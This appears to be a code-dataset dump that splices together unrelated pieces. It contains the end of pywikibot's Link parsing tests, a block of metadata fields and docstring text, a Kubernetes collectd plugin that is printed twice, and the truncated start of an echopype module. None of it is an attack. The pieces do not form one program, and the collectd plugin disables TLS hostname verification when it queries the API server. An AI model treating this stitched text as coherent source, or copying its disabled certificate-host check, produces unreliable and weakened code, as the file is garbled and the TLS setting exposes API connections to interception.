self.assertEqual(link.site, self.get_site('test.wp'))
self.assertEqual(link.title, 'Q6')
self.assertEqual(link.namespace, 1)
class TestFullyQualifiedOneSiteFamilyExplicitLinkParser(LinkTestCase):
"""Test links to one site target family."""
family = 'species'
code = 'species'
cached = True
def test_fully_qualified_NS0_code(self):
"""Test ':species:species:Main Page' on species is namespace 0."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':species:species:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_fully_qualified_NS1_code(self):
"""Test ':species:species:Talk:Main Page' on species is namespace 1."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link(':species:species:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
# ---- Tests of a Link without colons, which shouldn't be interwikis, follow.
class TestPartiallyQualifiedImplicitLinkSameSiteParser(LinkTestCase):
"""Test partially qualified links to same site."""
family = 'wikipedia'
code = 'en'
cached = True
def test_partially_qualified_NS0_code(self):
"""Test 'wikipedia:Main Page' on enwp is namespace 4."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('wikipedia:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 4)
def test_partially_qualified_NS1_code(self):
"""Test 'wikipedia:Talk:Main Page' on enwp is namespace 4."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('wikipedia:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Talk:Main Page')
self.assertEqual(link.namespace, 4)
def test_partially_qualified_NS0_family(self):
"""Test 'en:Main Page' on enwp is namespace 0."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('en:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_partially_qualified_NS1_family(self):
"""Test 'en:Talk:Main Page' on enwp is namespace 1."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('en:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
class TestPartiallyQualifiedImplicitLinkDifferentCodeParser(LinkTestCase):
"""Test partially qualified links to different code."""
family = 'wikipedia'
code = 'en'
cached = True
def test_partially_qualified_NS0_family(self):
"""Test 'en:Main Page' on dewp is namespace 0."""
config.mylang = 'de'
config.family = 'wikipedia'
link = Link('en:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_partially_qualified_NS1_family(self):
"""Test 'en:Talk:Main Page' on dewp is namespace 1."""
config.mylang = 'de'
config.family = 'wikipedia'
link = Link('en:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
class TestPartiallyQualifiedImplicitLinkDifferentFamilyParser(LinkTestCase):
"""Test partially qualified links to different family."""
family = 'wikipedia'
code = 'en'
cached = True
def test_partially_qualified_NS0_code(self):
"""Test 'wikipedia:Main Page' on enws is namespace 0."""
config.mylang = 'en'
config.family = 'wikisource'
link = Link('wikipedia:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_partially_qualified_NS1_code(self):
"""Test 'wikipedia:Talk:Main Page' on enws is ns 1."""
config.mylang = 'en'
config.family = 'wikisource'
link = Link('wikipedia:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
class TestFullyQualifiedImplicitLinkSameFamilyParser(LinkTestCase):
"""Link tests."""
family = 'wikipedia'
code = 'en'
cached = True
def test_fully_qualified_NS0_code(self):
"""Test 'en:wikipedia:Main Page' on enwp is namespace 4."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('en:wikipedia:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 4)
def test_fully_qualified_NS1_code(self):
"""Test 'en:wikipedia:Talk:Main Page' on enwp is namespace 4."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('en:wikipedia:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Talk:Main Page')
self.assertEqual(link.namespace, 4)
class TestFullyQualifiedImplicitLinkDifferentFamilyParser(LinkTestCase):
"""Test link to a different family without preleading colon."""
sites = {
'enws': {
'family': 'wikisource',
'code': 'en'
},
'enwp': {
'family': 'wikipedia',
'code': 'en'
}
}
cached = True
def test_fully_qualified_NS0_code(self):
"""Test 'en:wikipedia:Main Page' on enws is namespace 0."""
config.mylang = 'en'
config.family = 'wikisource'
link = Link('en:wikipedia:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_fully_qualified_NS1_code(self):
"""Test 'en:wikipedia:Main Page' on enws is namespace 1."""
config.mylang = 'en'
config.family = 'wikisource'
link = Link('en:wikipedia:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
def test_fully_qualified_NS0_family(self):
"""Test 'wikipedia:en:Main Page' on enws is namespace 0."""
config.mylang = 'en'
config.family = 'wikisource'
link = Link('wikipedia:en:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_fully_qualified_NS1_family(self):
"""Test 'wikipedia:en:Talk:Main Page' on enws is namespace 1."""
config.mylang = 'en'
config.family = 'wikisource'
link = Link('wikipedia:en:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
class TestFullyQualifiedImplicitLinkNoLangConfigFamilyParser(LinkTestCase):
"""Test implicit link from family without lang code to other family."""
sites = {
'wikidata': {
'family': 'wikidata',
'code': 'wikidata'
},
'enwp': {
'family': 'wikipedia',
'code': 'en'
}
}
cached = True
def test_fully_qualified_NS0_code(self):
"""Test 'en:wikipedia:Main Page' on wikidata is namespace 4."""
config.mylang = 'wikidata'
config.family = 'wikidata'
link = Link('en:wikipedia:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 4)
def test_fully_qualified_NS1_code(self):
"""Test 'en:wikipedia:Talk:Main Page' on wikidata isn't namespace 1."""
config.mylang = 'wikidata'
config.family = 'wikidata'
link = Link('en:wikipedia:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Talk:Main Page')
self.assertEqual(link.namespace, 4)
def test_fully_qualified_NS0_family(self):
"""Test 'wikipedia:en:Main Page' on wikidata is namespace 0."""
config.mylang = 'wikidata'
config.family = 'wikidata'
link = Link('wikipedia:en:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.namespace, 0)
self.assertEqual(link.title, 'Main Page')
def test_fully_qualified_NS1_family(self):
"""Test 'wikipedia:en:Talk:Main Page' on wikidata is namespace 1."""
config.mylang = 'wikidata'
config.family = 'wikidata'
link = Link('wikipedia:en:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site('enwp'))
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
class TestFullyQualifiedNoLangFamilyImplicitLinkParser(LinkTestCase):
"""Test wikibase links without preleading colon."""
family = 'wikidata'
code = 'test'
cached = True
def test_fully_qualified_NS0_code(self):
"""Test 'testwiki:wikidata:Q6' on enwp is namespace 0."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('testwiki:wikidata:Q6')
link.parse()
self.assertEqual(link.site, pywikibot.Site('wikidata', 'wikidata'))
self.assertEqual(link.title, 'Q6')
self.assertEqual(link.namespace, 0)
def test_fully_qualified_NS1_code(self):
"""Test 'testwiki:wikidata:Talk:Q6' on enwp is namespace 1."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('testwiki:wikidata:Talk:Q6')
link.parse()
self.assertEqual(link.site, pywikibot.Site('wikidata', 'wikidata'))
self.assertEqual(link.title, 'Q6')
self.assertEqual(link.namespace, 1)
def test_fully_qualified_NS0_family(self):
"""Test 'wikidata:testwiki:Q6' on enwp is namespace 0."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('wikidata:testwiki:Q6')
link.parse()
self.assertEqual(link.site, pywikibot.Site('test', 'wikipedia'))
self.assertEqual(link.title, 'Q6')
self.assertEqual(link.namespace, 0)
def test_fully_qualified_NS1_family(self):
"""Test 'wikidata:testwiki:Talk:Q6' on enwp is namespace 1."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('wikidata:testwiki:Talk:Q6')
link.parse()
self.assertEqual(link.site, pywikibot.Site('test', 'wikipedia'))
self.assertEqual(link.title, 'Q6')
self.assertEqual(link.namespace, 1)
class TestFullyQualifiedOneSiteFamilyImplicitLinkParser(LinkTestCase):
"""Test links to one site target family without preleading colon."""
family = 'species'
code = 'species'
cached = True
def test_fully_qualified_NS0_family_code(self):
"""Test 'species:species:Main Page' on enwp is namespace 0."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('species:species:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_fully_qualified_NS1_family_code(self):
"""Test 'species:species:Talk:Main Page' on enwp is namespace 1."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('species:species:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
def test_fully_qualified_NS0_code(self):
"""Test 'species:Main Page' on enwp is namespace 0."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('species:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 0)
def test_fully_qualified_NS1_code(self):
"""Test 'species:Talk:Main Page' on enwp is namespace 1."""
config.mylang = 'en'
config.family = 'wikipedia'
link = Link('species:Talk:Main Page')
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'Main Page')
self.assertEqual(link.namespace, 1)
class TestEmptyTitle(TestCase):
"""Test links which contain no title."""
family = 'wikipedia'
code = 'en'
def test_interwiki_mainpage(self):
"""Test that Link allow links without a title to the main page."""
link = Link('en:', self.get_site())
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, '')
self.assertEqual(link.namespace, 0)
def test_interwiki_namespace_without_title(self):
"""Test that Link doesn't allow links without a title."""
link = Link('en:Help:', self.get_site())
self.assertRaisesRegex(
InvalidTitle, "'en:Help:' has no title.", link.parse)
def test_no_text(self):
"""Test that Link doesn't allow empty."""
link = Link('', self.get_site())
self.assertRaisesRegex(
InvalidTitle, 'The link does not contain a page title',
link.parse)
def test_namespace_lookalike(self):
"""Test that Link does only detect valid namespaces."""
link = Link('CAT:', self.get_site())
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'CAT:')
self.assertEqual(link.namespace, 0)
link = Link('en:CAT:', self.get_site())
link.parse()
self.assertEqual(link.site, self.get_site())
self.assertEqual(link.title, 'CAT:')
self.assertEqual(link.namespace, 0)
class TestInvalidInterwikiLinks(WikimediaDefaultSiteTestCase):
"""Test links to non-wikis."""
family = 'wikipedia'
code = 'en'
def test_non_wiki_prefix(self):
"""Test that Link fails if the interwiki prefix is not a wiki."""
link = Link('bugzilla:1337', source=self.site)
self.assertRaisesRegex(
Error,
'bugzilla:1337 is not a local page on wikipedia:en, and the '
'interwiki prefix bugzilla is not supported by Pywikibot!',
link.parse)
def test_other_wiki_prefix(self):
"""Test that Link fails if the interwiki prefix is a unknown family."""
link = Link('bulba:this-will-never-work', source=self.site)
self.assertRaisesRegex(
Error,
'bulba:this-will-never-work is not a local page on wikipedia:en, '
'and the interwiki prefix bulba is not supported by Pywikibot!',
link.parse)
class TestSiteLink(WikimediaDefaultSiteTestCase):
"""Test parsing namespaces when creating SiteLinks."""
def _test_link(self, link, title, namespace, site_code, site_fam):
"""Test the separate contents of the link."""
self.assertEqual(link.title, title)
self.assertEqual(link.namespace, namespace)
self.assertEqual(link.site, Site(site_code, site_fam))
self.assertEqual(link.badges, [])
def test_site_link(self):
"""Test parsing of title."""
self._test_link(SiteLink('Foobar', 'enwiki'),
'Foobar', Namespace.MAIN, 'en', 'wikipedia')
self._test_link(SiteLink('Mall:!!', 'svwiki'),
'!!', Namespace.TEMPLATE, 'sv', 'wikipedia')
self._test_link(SiteLink('Vorlage:!!', 'dewikibooks'),
'!!', Namespace.TEMPLATE, 'de', 'wikibooks')
self._test_link(SiteLink('Ai Weiwei: Never Sorry', 'enwiki'),
'Ai Weiwei: Never Sorry', Namespace.MAIN,
'en', 'wikipedia')
if __name__ == '__main__': # pragma: no cover
try:
unittest.main()
except SystemExit:
pass
|
en
| 0.730256
|
# -*- coding: utf-8 -*- Test Link functionality. # # (C) Pywikibot team, 2014-2019 # # Distributed under the terms of the MIT license. # Test C{Link.create_separated}. Test the separate contents of the link. Test combinations of parameters. # ---- Tests checking if the parser does (not) accept (in)valid titles Test parsing links with DrySite. The DrySite is using the builtin namespaces which behaviour is controlled in this repository so namespace aware tests do work, even when the actual default site is using completely different namespaces. Test that valid titles are correctly normalized. # Length is 256 total, but only title part matters #233; B', site).title, 'A é B') #x00E9; B', site).title, 'A é B') #160; B', site).title, 'A B') Test that invalid titles raise InvalidTitle exception. # Bad characters forbidden regardless of wgLegalTitleChars # URL encoding # %XX is understood by wikimedia but not %XXXX # A link is invalid if their (non-)talk page would be in another # namespace than the link's "other" namespace # Directory navigation # Tilde # Overlength # Namespace prefix without actual title #bar'] Test that relative links are handled properly. # Subpage # Subpage of Page with section #Baz') # Non-subpage link text beginning with slash Test T102461 (Python issue 10254). Set up test case. Tear down test case. Test T102461 (Python issue 10254) is not encountered. # ---- The first set of tests are explicit links, starting with a ':'. Link tests. Test ':wikipedia:Main Page' on enwp is namespace 4. Test ':wikipedia:Talk:Main Page' on enwp is namespace 4. Test ':en:Main Page' on enwp is namespace 0. Test ':en:Talk:Main Page' on enwp is namespace 1. Link tests. Test ':en:Main Page' on dewp is namespace 0. Test ':en:Talk:Main Page' on dewp is namespace 1. Link tests. Test ':wikipedia:Main Page' on enws is namespace 0. Test ':wikipedia:Talk:Main Page' on enws is ns 1. Link tests. Test namespace is selected before family. Link tests. Test ':en:wikipedia:Main Page' on enwp is namespace 4. Test ':en:wikipedia:Talk:Main Page' on enwp is namespace 4. Test link to a different family. Test ':en:wikipedia:Main Page' on enws is namespace 0. Test ':en:wikipedia:Main Page' on enwp is namespace 1. Test ':wikipedia:en:Main Page' on enws is namespace 0. Test ':wikipedia:en:Talk:Main Page' on enws is namespace 1. Test link from family without lang code to a different family. Test ':en:wikipedia:Main Page' on wikidata is namespace 4. Test ':en:wikipedia:Talk:Main Page' on wikidata is namespace 4. Test ':wikipedia:en:Main Page' on wikidata is namespace 0. Test ':wikipedia:en:Talk:Main Page' on wikidata is namespace 1. Test wikibase links. Test ':testwiki:wikidata:Q6' on enwp is namespace 0. Test ':testwiki:wikidata:Talk:Q6' on enwp is namespace 1. Test ':wikidata:testwiki:Q6' on enwp is namespace 0. Test ':wikidata:testwiki:Talk:Q6' on enwp is namespace 1. Test links to one site target family. Test ':species:species:Main Page' on species is namespace 0. Test ':species:species:Talk:Main Page' on species is namespace 1. # ---- Tests of a Link without colons, which shouldn't be interwikis, follow. Test partially qualified links to same site. Test 'wikipedia:Main Page' on enwp is namespace 4. Test 'wikipedia:Talk:Main Page' on enwp is namespace 4. Test 'en:Main Page' on enwp is namespace 0. Test 'en:Talk:Main Page' on enwp is namespace 1. Test partially qualified links to different code. Test 'en:Main Page' on dewp is namespace 0. Test 'en:Talk:Main Page' on dewp is namespace 1. Test partially qualified links to different family. Test 'wikipedia:Main Page' on enws is namespace 0. Test 'wikipedia:Talk:Main Page' on enws is ns 1. Link tests. Test 'en:wikipedia:Main Page' on enwp is namespace 4. Test 'en:wikipedia:Talk:Main Page' on enwp is namespace 4. Test link to a different family without preleading colon. Test 'en:wikipedia:Main Page' on enws is namespace 0. Test 'en:wikipedia:Main Page' on enws is namespace 1. Test 'wikipedia:en:Main Page' on enws is namespace 0. Test 'wikipedia:en:Talk:Main Page' on enws is namespace 1. Test implicit link from family without lang code to other family. Test 'en:wikipedia:Main Page' on wikidata is namespace 4. Test 'en:wikipedia:Talk:Main Page' on wikidata isn't namespace 1. Test 'wikipedia:en:Main Page' on wikidata is namespace 0. Test 'wikipedia:en:Talk:Main Page' on wikidata is namespace 1. Test wikibase links without preleading colon. Test 'testwiki:wikidata:Q6' on enwp is namespace 0. Test 'testwiki:wikidata:Talk:Q6' on enwp is namespace 1. Test 'wikidata:testwiki:Q6' on enwp is namespace 0. Test 'wikidata:testwiki:Talk:Q6' on enwp is namespace 1. Test links to one site target family without preleading colon. Test 'species:species:Main Page' on enwp is namespace 0. Test 'species:species:Talk:Main Page' on enwp is namespace 1. Test 'species:Main Page' on enwp is namespace 0. Test 'species:Talk:Main Page' on enwp is namespace 1. Test links which contain no title. Test that Link allow links without a title to the main page. Test that Link doesn't allow links without a title. Test that Link doesn't allow empty. Test that Link does only detect valid namespaces. Test links to non-wikis. Test that Link fails if the interwiki prefix is not a wiki. Test that Link fails if the interwiki prefix is a unknown family. Test parsing namespaces when creating SiteLinks. Test the separate contents of the link. Test parsing of title. # pragma: no cover
| 2.544282
| 3
|
src/docker-images/collectd/kubernetes_collectd.py
|
resouer/DLWorkspace
| 0
|
6627563
|
<gh_stars>0
#!/usr/bin/env python
import collectd
import json
import os
import subprocess
import sys
import yaml
import re
import pycurl
from StringIO import StringIO
import traceback
def curl_get(url):
curl = pycurl.Curl()
curl.setopt(pycurl.URL, url)
curl.setopt(pycurl.SSL_VERIFYPEER, 1)
curl.setopt(pycurl.SSL_VERIFYHOST, 0)
curl.setopt(pycurl.CAINFO, "/etc/kubernetes/ssl/ca.pem")
curl.setopt(pycurl.SSLKEYTYPE, "PEM")
curl.setopt(pycurl.SSLKEY, "/etc/kubernetes/ssl/apiserver-key.pem")
curl.setopt(pycurl.SSLCERTTYPE, "PEM")
curl.setopt(pycurl.SSLCERT, "/etc/kubernetes/ssl/apiserver.pem")
curl.setopt(curl.FOLLOWLOCATION, True)
buff = StringIO()
curl.setopt(pycurl.WRITEFUNCTION, buff.write)
curl.perform()
responseStr = buff.getvalue()
curl.close()
return responseStr
def configure(conf):
collectd.info('Configured with')
def read(data=None):
vl = collectd.Values(type='gauge')
vl.plugin = 'kubernetes'
try:
rsset = json.loads(curl_get(os.environ['K8SAPI']+"/apis/extensions/v1beta1/replicasets"))
if "items" in rsset:
for rs in rsset["items"]:
if "metadata" in rs and "name" in rs["metadata"] and "status" in rs:
vl.plugin_instance = rs["metadata"]["name"]
if "availableReplicas" in rs["status"]:
numberAvailable = float(rs["status"]["availableReplicas"])
else:
numberAvailable = 0
if "replicas" in rs["status"]:
desiredNumber = float(rs["status"]["replicas"])
else:
desiredNumber = 0
if "readyReplicas" in rs["status"]:
readyNumber = float(rs["status"]["readyReplicas"])
else:
readyNumber = 0
collectd.info('kubernetes plugin: replicaset "%s" with values: %f %f %f' % (rs["metadata"]["name"],desiredNumber,numberAvailable,readyNumber))
if desiredNumber > 0 and desiredNumber == readyNumber and desiredNumber == numberAvailable:
res = 0
else:
res = 1
vl.dispatch(values=[float(res)])
rsset = json.loads(curl_get(os.environ['K8SAPI']+"/apis/extensions/v1/ReplicationController"))
if "items" in rsset:
for rs in rsset["items"]:
if "metadata" in rs and "name" in rs["metadata"] and "status" in rs:
vl.plugin_instance = rs["metadata"]["name"]
if "availableReplicas" in rs["status"]:
numberAvailable = float(rs["status"]["availableReplicas"])
else:
numberAvailable = 0
if "replicas" in rs["status"]:
desiredNumber = float(rs["status"]["replicas"])
else:
desiredNumber = 0
if "readyReplicas" in rs["status"]:
readyNumber = float(rs["status"]["readyReplicas"])
else:
readyNumber = 0
collectd.info('kubernetes plugin: ReplicationController "%s" with values: %f %f %f' % (rs["metadata"]["name"],desiredNumber,numberAvailable,readyNumber))
if desiredNumber > 0 and desiredNumber == readyNumber and desiredNumber == numberAvailable:
res = 0
else:
res = 1
vl.dispatch(values=[float(res)])
dpset = json.loads(curl_get(os.environ['K8SAPI']+"/apis/extensions/v1beta1/daemonsets"))
if "items" in dpset:
for dp in dpset["items"]:
if "metadata" in dp and "name" in dp["metadata"] and "status" in dp:
vl.plugin_instance = dp["metadata"]["name"]
if "numberAvailable" in dp["status"]:
numberAvailable = float(dp["status"]["numberAvailable"])
else:
numberAvailable = 0
if "desiredNumberScheduled" in dp["status"]:
desiredNumber = float(dp["status"]["desiredNumberScheduled"])
else:
desiredNumber = 0
if "numberReady" in dp["status"]:
readyNumber = float(dp["status"]["numberReady"])
else:
readyNumber = 0
collectd.info('kubernetes plugin: deployment "%s" with values: %f %f %f' % (dp["metadata"]["name"],desiredNumber,numberAvailable,readyNumber))
if desiredNumber > 0 and desiredNumber == readyNumber and desiredNumber == numberAvailable:
res = 0
else:
res = 1
vl.dispatch(values=[float(res)])
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
print "*** print_tb:"
traceback.print_tb(exc_traceback, limit=1, file=sys.stdout)
print "*** print_exception:"
traceback.print_exception(exc_type, exc_value, exc_traceback,
limit=2, file=sys.stdout)
print "*** print_exc:"
traceback.print_exc()
try:
used_gpus = 0
pods = json.loads( curl_get(os.environ['K8SAPI']+"/api/v1/pods"))
if "items" in pods:
for item in pods["items"]:
if "spec" in item and "containers" in item["spec"]:
if "status" in item and "phase" in item["status"] and item["status"]["phase"] == "Running":
for container in item["spec"]["containers"]:
if "resources" in container and "requests" in container["resources"] and "alpha.kubernetes.io/nvidia-gpu" in container["resources"]["requests"]:
used_gpus += int(container["resources"]["requests"]["alpha.kubernetes.io/nvidia-gpu"])
vl = collectd.Values(type='gauge')
vl.plugin = 'gpu'
vl.plugin_instance = "usedgpu"
vl.dispatch(values=[float(used_gpus)])
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
print "*** print_tb:"
traceback.print_tb(exc_traceback, limit=1, file=sys.stdout)
print "*** print_exception:"
traceback.print_exception(exc_type, exc_value, exc_traceback,
limit=2, file=sys.stdout)
print "*** print_exc:"
traceback.print_exc()
try:
total_gpus = 0
nodes = json.loads( curl_get(os.environ['K8SAPI']+"/api/v1/nodes"))
if "items" in nodes:
for item in nodes["items"]:
if "status" in item and "capacity" in item["status"] and "alpha.kubernetes.io/nvidia-gpu" in item["status"]["capacity"]:
total_gpus += int(item["status"]["capacity"]["alpha.kubernetes.io/nvidia-gpu"])
vl = collectd.Values(type='gauge')
vl.plugin = 'gpu'
vl.plugin_instance = "totalgpu"
vl.dispatch(values=[float(total_gpus)])
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
print "*** print_tb:"
traceback.print_tb(exc_traceback, limit=1, file=sys.stdout)
print "*** print_exception:"
traceback.print_exception(exc_type, exc_value, exc_traceback,
limit=2, file=sys.stdout)
print "*** print_exc:"
traceback.print_exc()
collectd.register_config(configure)
collectd.register_read(read)
|
#!/usr/bin/env python
import collectd
import json
import os
import subprocess
import sys
import yaml
import re
import pycurl
from StringIO import StringIO
import traceback
def curl_get(url):
curl = pycurl.Curl()
curl.setopt(pycurl.URL, url)
curl.setopt(pycurl.SSL_VERIFYPEER, 1)
curl.setopt(pycurl.SSL_VERIFYHOST, 0)
curl.setopt(pycurl.CAINFO, "/etc/kubernetes/ssl/ca.pem")
curl.setopt(pycurl.SSLKEYTYPE, "PEM")
curl.setopt(pycurl.SSLKEY, "/etc/kubernetes/ssl/apiserver-key.pem")
curl.setopt(pycurl.SSLCERTTYPE, "PEM")
curl.setopt(pycurl.SSLCERT, "/etc/kubernetes/ssl/apiserver.pem")
curl.setopt(curl.FOLLOWLOCATION, True)
buff = StringIO()
curl.setopt(pycurl.WRITEFUNCTION, buff.write)
curl.perform()
responseStr = buff.getvalue()
curl.close()
return responseStr
def configure(conf):
collectd.info('Configured with')
def read(data=None):
vl = collectd.Values(type='gauge')
vl.plugin = 'kubernetes'
try:
rsset = json.loads(curl_get(os.environ['K8SAPI']+"/apis/extensions/v1beta1/replicasets"))
if "items" in rsset:
for rs in rsset["items"]:
if "metadata" in rs and "name" in rs["metadata"] and "status" in rs:
vl.plugin_instance = rs["metadata"]["name"]
if "availableReplicas" in rs["status"]:
numberAvailable = float(rs["status"]["availableReplicas"])
else:
numberAvailable = 0
if "replicas" in rs["status"]:
desiredNumber = float(rs["status"]["replicas"])
else:
desiredNumber = 0
if "readyReplicas" in rs["status"]:
readyNumber = float(rs["status"]["readyReplicas"])
else:
readyNumber = 0
collectd.info('kubernetes plugin: replicaset "%s" with values: %f %f %f' % (rs["metadata"]["name"],desiredNumber,numberAvailable,readyNumber))
if desiredNumber > 0 and desiredNumber == readyNumber and desiredNumber == numberAvailable:
res = 0
else:
res = 1
vl.dispatch(values=[float(res)])
rsset = json.loads(curl_get(os.environ['K8SAPI']+"/apis/extensions/v1/ReplicationController"))
if "items" in rsset:
for rs in rsset["items"]:
if "metadata" in rs and "name" in rs["metadata"] and "status" in rs:
vl.plugin_instance = rs["metadata"]["name"]
if "availableReplicas" in rs["status"]:
numberAvailable = float(rs["status"]["availableReplicas"])
else:
numberAvailable = 0
if "replicas" in rs["status"]:
desiredNumber = float(rs["status"]["replicas"])
else:
desiredNumber = 0
if "readyReplicas" in rs["status"]:
readyNumber = float(rs["status"]["readyReplicas"])
else:
readyNumber = 0
collectd.info('kubernetes plugin: ReplicationController "%s" with values: %f %f %f' % (rs["metadata"]["name"],desiredNumber,numberAvailable,readyNumber))
if desiredNumber > 0 and desiredNumber == readyNumber and desiredNumber == numberAvailable:
res = 0
else:
res = 1
vl.dispatch(values=[float(res)])
dpset = json.loads(curl_get(os.environ['K8SAPI']+"/apis/extensions/v1beta1/daemonsets"))
if "items" in dpset:
for dp in dpset["items"]:
if "metadata" in dp and "name" in dp["metadata"] and "status" in dp:
vl.plugin_instance = dp["metadata"]["name"]
if "numberAvailable" in dp["status"]:
numberAvailable = float(dp["status"]["numberAvailable"])
else:
numberAvailable = 0
if "desiredNumberScheduled" in dp["status"]:
desiredNumber = float(dp["status"]["desiredNumberScheduled"])
else:
desiredNumber = 0
if "numberReady" in dp["status"]:
readyNumber = float(dp["status"]["numberReady"])
else:
readyNumber = 0
collectd.info('kubernetes plugin: deployment "%s" with values: %f %f %f' % (dp["metadata"]["name"],desiredNumber,numberAvailable,readyNumber))
if desiredNumber > 0 and desiredNumber == readyNumber and desiredNumber == numberAvailable:
res = 0
else:
res = 1
vl.dispatch(values=[float(res)])
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
print "*** print_tb:"
traceback.print_tb(exc_traceback, limit=1, file=sys.stdout)
print "*** print_exception:"
traceback.print_exception(exc_type, exc_value, exc_traceback,
limit=2, file=sys.stdout)
print "*** print_exc:"
traceback.print_exc()
try:
used_gpus = 0
pods = json.loads( curl_get(os.environ['K8SAPI']+"/api/v1/pods"))
if "items" in pods:
for item in pods["items"]:
if "spec" in item and "containers" in item["spec"]:
if "status" in item and "phase" in item["status"] and item["status"]["phase"] == "Running":
for container in item["spec"]["containers"]:
if "resources" in container and "requests" in container["resources"] and "alpha.kubernetes.io/nvidia-gpu" in container["resources"]["requests"]:
used_gpus += int(container["resources"]["requests"]["alpha.kubernetes.io/nvidia-gpu"])
vl = collectd.Values(type='gauge')
vl.plugin = 'gpu'
vl.plugin_instance = "usedgpu"
vl.dispatch(values=[float(used_gpus)])
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
print "*** print_tb:"
traceback.print_tb(exc_traceback, limit=1, file=sys.stdout)
print "*** print_exception:"
traceback.print_exception(exc_type, exc_value, exc_traceback,
limit=2, file=sys.stdout)
print "*** print_exc:"
traceback.print_exc()
try:
total_gpus = 0
nodes = json.loads( curl_get(os.environ['K8SAPI']+"/api/v1/nodes"))
if "items" in nodes:
for item in nodes["items"]:
if "status" in item and "capacity" in item["status"] and "alpha.kubernetes.io/nvidia-gpu" in item["status"]["capacity"]:
total_gpus += int(item["status"]["capacity"]["alpha.kubernetes.io/nvidia-gpu"])
vl = collectd.Values(type='gauge')
vl.plugin = 'gpu'
vl.plugin_instance = "totalgpu"
vl.dispatch(values=[float(total_gpus)])
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
print "*** print_tb:"
traceback.print_tb(exc_traceback, limit=1, file=sys.stdout)
print "*** print_exception:"
traceback.print_exception(exc_type, exc_value, exc_traceback,
limit=2, file=sys.stdout)
print "*** print_exc:"
traceback.print_exc()
collectd.register_config(configure)
collectd.register_read(read)
|
ru
| 0.26433
|
#!/usr/bin/env python
| 2.067993
| 2
|
echopype/convert/set_groups_base.py
|
mbdunn/echopype
| 0
|
6627564
|
<reponame>mbdunn/echopype
import abc
from typing import Set
import numpy as np
import pynmea2
import xarray as xr
from ..echodata.convention import sonarnetcdf_1
from ..utils.coding import COMPRESSION_SETTINGS, set_encodings
from ..utils.prov import echopype_prov_attrs, source_files_vars
DEFAULT_CHUNK_SIZE = {"range_sample": 25000, "ping_time": 2500}
